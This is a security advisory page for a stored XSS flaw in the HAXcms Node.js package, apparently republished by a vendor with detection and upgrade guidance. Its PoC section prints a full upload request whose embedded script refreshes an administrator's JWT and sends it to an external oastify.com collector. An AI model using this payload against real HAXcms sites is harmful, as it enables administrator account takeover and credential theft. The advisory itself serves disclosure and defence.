GHSA-3fm2-xfq7-7778
HIGHHAXcms Has Stored XSS Vulnerability that May Lead to Account Takeover
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
@haxtheweb/haxcms-nodejsnpmDescription
Summary
Stored XSS Leading to Account Takeover
Details
The Exploit Chain:
1.Upload: The attacker uploads an .html file containing a JavaScript payload.
2.Execution: A logged-in administrator is tricked into visiting the URL of this uploaded file.
3.Token Refresh: The JavaScript payload makes a fetch request to the /system/api/refreshAccessToken endpoint. Because the administrator is logged in, their browser automatically attaches the haxcms_refresh_token cookie to this request.
4.JWT Theft: The server validates the refresh token and responds with a new, valid JWT access token in the JSON response.
5.Exfiltration: The JavaScript captures this new JWT from the response and sends it to an attacker-controlled server.
6.Account Takeover: The attacker now possesses a valid administrator JWT and can take full control of the application.
Vulnerability recurrence:
<img width="1198" height="756" alt="image" src="https://github.com/user-attachments/assets/7062d542-702e-4cbe-8493-da0f71e790c3" />Then we test access to this html
<img width="1433" height="1019" alt="image" src="https://github.com/user-attachments/assets/6c72c92f-a151-4b0e-b6ba-d83ffb771253" />You can obtain other people's identity information
<img width="1082" height="290" alt="image" src="https://github.com/user-attachments/assets/23398ea4-f08c-47bd-b2f1-89071af0e275" />PoC
POST /system/api/saveFile?siteName=yu&site_token=neWmRyvNbCCwiQ7MP2ojAjVMk-HtjlKYNOqsQjLt3RQ&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlVqUzd6NFRFano1Q2xUMERiNnU0RmFROWJZSXgyMjd5OHN2NzRWb1hLbFkiLCJpYXQiOjE3NTUyNDYxODYsImV4cCI6MTc1NTI0NzA4NiwidXNlciI6ImFkbWluIn0.XrXr427aKbyw97aDjD2OX128DznGtw_CHMALAeodb0M HTTP/1.1 Host: 192.168.1.72:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Connection: close Content-Length: 1128
------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="bulk-import"
true ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file-upload"; filename="files/pwn1116.html" Content-Type: text/plain
<script> // This version adds headers to make the request look more legitimate. fetch('/system/api/refreshAccessToken', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: '{}' // Sending an empty JSON object body }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok ' + response.statusText); } return response.json(); }) .then(data => { var stolenJWT = data.jwt; var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?jwt=' + stolenJWT; fetch(attackerUrl); }) .catch(error => { var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?error=' + error.message; fetch(attackerUrl); }); </script> <h1>Processing your request...</h1> ------WebKitFormBoundary7MA4YWxkTrZu0gW--Impact
The attacker now possesses a valid administrator JWT and can take full control of the application.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | @haxtheweb/haxcms-nodejs | ≥ 11.0.6&&< 25.0.0 | 25.0.0 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
by banyamer · Apr 29, 2026
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @haxtheweb/haxcms-nodejs. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @haxtheweb/haxcms-nodejs to 25.0.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-3fm2-xfq7-7778 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-3fm2-xfq7-7778 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-3fm2-xfq7-7778. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-3fm2-xfq7-7778 in your dependencies?
O3 detects GHSA-3fm2-xfq7-7778 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.